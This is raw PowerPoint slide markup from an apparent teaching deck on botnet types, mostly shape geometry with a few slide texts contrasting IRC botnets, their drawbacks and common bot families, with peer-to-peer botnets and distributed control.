                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="678941" y="706501"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1222375" h="2473960">
                    <a:moveTo>
                      <a:pt x="1221866" y="69850"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1221866" y="919226"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1222375" h="2473960">
                    <a:moveTo>
                      <a:pt x="611758" y="1130300"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="611758" y="1343025"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1222375" h="2473960">
                    <a:moveTo>
                      <a:pt x="611758" y="1766951"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="611758" y="1978025"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1222375" h="2473960">
                    <a:moveTo>
                      <a:pt x="1154683" y="1484376"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1154683" y="1766951"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1222375" h="2473960">
                    <a:moveTo>
                      <a:pt x="1154683" y="2190750"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1154683" y="2473452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/>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="object 23"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId24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7754366" y="1919223"/>
                <a:ext cx="625513" cy="685800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="object 24"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId26"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10872" y="7547"/>
              <a:ext cx="2950" cy="55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sz="2200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204"/>
                </a:rPr>
                <a:t>Botnet</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2200" b="1" spc="-25" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2200" b="1" spc="-20" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204"/>
                </a:rPr>
                <a:t>user</a:t>
              </a:r>
              <a:endParaRPr sz="2200" b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Types Botnets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745" y="1022350"/>
            <a:ext cx="2552700" cy="4959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IRC botnets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437515" y="1594485"/>
            <a:ext cx="8285480" cy="1169035"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 9805"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202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3020" indent="0" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab pos="4204335" algn="l"/>
              </a:tabLst>
            </a:pP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Botherders are migrating away from IRC botnets because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researchers know how to track them.</a:t>
            </a:r>
            <a:endParaRPr sz="2600" b="1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6" name="object 2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361315" y="2941320"/>
            <a:ext cx="7255510" cy="3344545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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4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Drawbacks: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Centralized server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IRC is not that secure by default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Security researchers understand IRC too.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4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Common IRC Bots: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SDBot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Rbot (Rxbot)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Gaobot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8246745" y="1725295"/>
            <a:ext cx="3312160" cy="4200525"/>
            <a:chOff x="10801" y="3161"/>
            <a:chExt cx="5216" cy="6615"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3" name="object 5"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5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11479" y="5987"/>
              <a:ext cx="1508" cy="1692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="object 6"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7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5429" y="6327"/>
              <a:ext cx="589" cy="667"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="object 7"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9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4600" y="9110"/>
              <a:ext cx="591" cy="667"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="object 8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13672" y="6327"/>
              <a:ext cx="620" cy="2895"/>
              <a:chOff x="7157466" y="4017962"/>
              <a:chExt cx="393700" cy="1838325"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="33" name="object 9"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId10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157466" y="4017962"/>
                <a:ext cx="373913" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="34" name="object 10"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId11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176643" y="4724336"/>
                <a:ext cx="373913" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="object 11"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId12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176643" y="5430837"/>
                <a:ext cx="373913" cy="425450"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="object 12"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId13"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7353935" y="4441825"/>
                <a:ext cx="0" cy="989330"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path h="989329">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="282575"/>
                    </a:lnTo>
                  </a:path>
                  <a:path h="989329">
                    <a:moveTo>
                      <a:pt x="0" y="706374"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="989076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/>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="object 13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="14600" y="7997"/>
              <a:ext cx="592" cy="1003"/>
              <a:chOff x="7747127" y="5078412"/>
              <a:chExt cx="375920" cy="636905"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="object 14"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId14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747127" y="5078412"/>
                <a:ext cx="375399" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="object 15"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId15"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7945120" y="5502275"/>
                <a:ext cx="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h="212725">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="212725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/>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="40" name="object 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="11901" y="3161"/>
              <a:ext cx="4117" cy="6172"/>
              <a:chOff x="6033134" y="2007107"/>
              <a:chExt cx="2614295" cy="3919220"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="41" name="object 17"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId16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73287" y="5502274"/>
                <a:ext cx="373913" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="42" name="object 18"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId17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273287" y="4795837"/>
                <a:ext cx="373913" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="43" name="object 19"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId18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747126" y="3735387"/>
                <a:ext cx="375399" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="44" name="object 20"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId19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747126" y="4371911"/>
                <a:ext cx="375399" cy="423862"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="object 21"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId20"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7322565" y="2906648"/>
                <a:ext cx="124396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1243965" h="244475">
                    <a:moveTo>
                      <a:pt x="809878" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="568198" y="74802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202818" y="36195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99060"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365505" y="137540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125222" y="211962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433450" y="244475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673734" y="170052"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041145" y="208787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1243837" y="145923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="876426" y="107314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1118107" y="32385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809878" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FDA400"/>
              </a:solidFill>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
              <a:p/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="46" name="object 22"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId21"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7322565" y="2906648"/>
                <a:ext cx="124396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1243965" h="244475">
                    <a:moveTo>
                      <a:pt x="809878" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="809878" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1066736" y="26987"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1118107" y="32385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1069783" y="47383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1021441" y="62363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="973093" y="77336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="924751" y="92316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="876426" y="107314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="928943" y="112819"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="981446" y="118334"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1033937" y="123856"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1086420" y="129381"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1138896" y="134903"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1191368" y="140418"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1243837" y="145923"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1193164" y="161639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1142491" y="177355"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1091818" y="193071"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1041145" y="208787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="988676" y="203236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="936204" y="197687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="883728" y="192142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831245" y="186604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="778754" y="181075"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="726251" y="175557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673734" y="170052"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625666" y="184913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="577615" y="199779"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="529570" y="214657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481519" y="229554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433450" y="244475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382079" y="239023"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330708" y="233590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279336" y="228171"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227965" y="222762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176593" y="217361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125222" y="211962"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173290" y="197090"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221341" y="182200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269386" y="167303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="317437" y="152413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365505" y="137540"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313308" y="132043"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261109" y="126546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208905" y="121049"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156694" y="115551"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104474" y="110054"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52244" y="104557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="99060"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50692" y="83343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101409" y="67627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152126" y="51911"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202818" y="36195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255015" y="41739"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307212" y="47270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359409" y="52790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411606" y="58301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463803" y="63805"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="516000" y="69305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568198" y="74802"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="616570" y="59805"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664919" y="44833"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="713249" y="29878"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="761567" y="14936"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809878" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:ln w="909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/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="47" name="object 23"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId22"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6033134" y="2403474"/>
                <a:ext cx="1503045" cy="1341755"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1503045" h="1341754">
                    <a:moveTo>
                      <a:pt x="1437291" y="41227"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1322451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16890" y="1341374"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454161" y="60169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1437291" y="41227"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1503045" h="1341754">
                    <a:moveTo>
                      <a:pt x="1489568" y="32765"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1446784" y="32765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1463674" y="51688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454161" y="60169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1471040" y="79121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489568" y="32765"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1503045" h="1341754">
                    <a:moveTo>
                      <a:pt x="1446784" y="32765"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1437291" y="41227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1454161" y="60169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1463674" y="51688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1446784" y="32765"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                  <a:path w="1503045" h="1341754">
                    <a:moveTo>
                      <a:pt x="1502664" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1420367" y="22225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1437291" y="41227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1446784" y="32765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1489568" y="32765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150266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p/>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="48" name="object 24"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId23"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7353934" y="3028949"/>
                <a:ext cx="1181100" cy="2473325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473325">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="919099"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1181100" h="2473325">
                    <a:moveTo>
                      <a:pt x="656209" y="69850"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="656209" y="706501"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1181100" h="2473325">
                    <a:moveTo>
                      <a:pt x="1180973" y="69850"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1180973" y="919099"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1181100" h="2473325">
                    <a:moveTo>
                      <a:pt x="591185" y="1130300"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="591185" y="1343025"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1181100" h="2473325">
                    <a:moveTo>
                      <a:pt x="591185" y="1766824"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="591185" y="1978025"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1181100" h="2473325">
                    <a:moveTo>
                      <a:pt x="1115949" y="1484249"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1115949" y="1766824"/>
                    </a:lnTo>
                  </a:path>
                  <a:path w="1181100" h="2473325">
                    <a:moveTo>
                      <a:pt x="1115949" y="2190750"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1115949" y="2473325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/>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="49" name="object 25"/>
              <p:cNvPicPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId24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7642224" y="2060574"/>
                <a:ext cx="604481" cy="685800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="object 26"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId26"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7507859" y="2007107"/>
                <a:ext cx="697865" cy="730885"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="697865" h="730885">
                    <a:moveTo>
                      <a:pt x="697357" y="99060"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="592201" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348272" y="258889"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107442" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1651" y="98425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248970" y="364286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="628523"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105156" y="727583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347586" y="470281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589915" y="730758"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695706" y="632333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446887" y="364883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697357" y="9906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p/>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="object 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId27"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10801" y="7689"/>
              <a:ext cx="2871" cy="55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sz="2200" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204"/>
                </a:rPr>
                <a:t>Botnet</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2200" b="1" spc="-25" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2200" b="1" spc="-20" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204"/>
                </a:rPr>
                <a:t>user</a:t>
              </a:r>
              <a:endParaRPr sz="2200" b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Types Botnets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745" y="1022350"/>
            <a:ext cx="2552700" cy="4959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P2P botnets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object 2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361315" y="1518285"/>
            <a:ext cx="7255510" cy="866140"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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Distributed control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2839720" y="2155825"/>
            <a:ext cx="6512560" cy="4111625"/>
            <a:chOff x="2051050" y="2708275"/>
            <a:chExt cx="5763260" cy="3638550"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="object 5"/>
            <p:cNvPicPr/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2771775" y="2997200"/>
              <a:ext cx="649287" cy="685800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>
              <p:custDataLst>
                <p:tags r:id="rId6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4140200" y="4724400"/>
              <a:ext cx="649287" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="object 7"/>
            <p:cNvPicPr/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5796026" y="4436998"/>
              <a:ext cx="649287" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8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3995801" y="2708275"/>
              <a:ext cx="649287" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="object 9"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9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2051050" y="3860800"/>
              <a:ext cx="649287" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="object 10"/>
            <p:cNvPicPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10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5580126" y="5661025"/>
              <a:ext cx="649287" cy="685800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
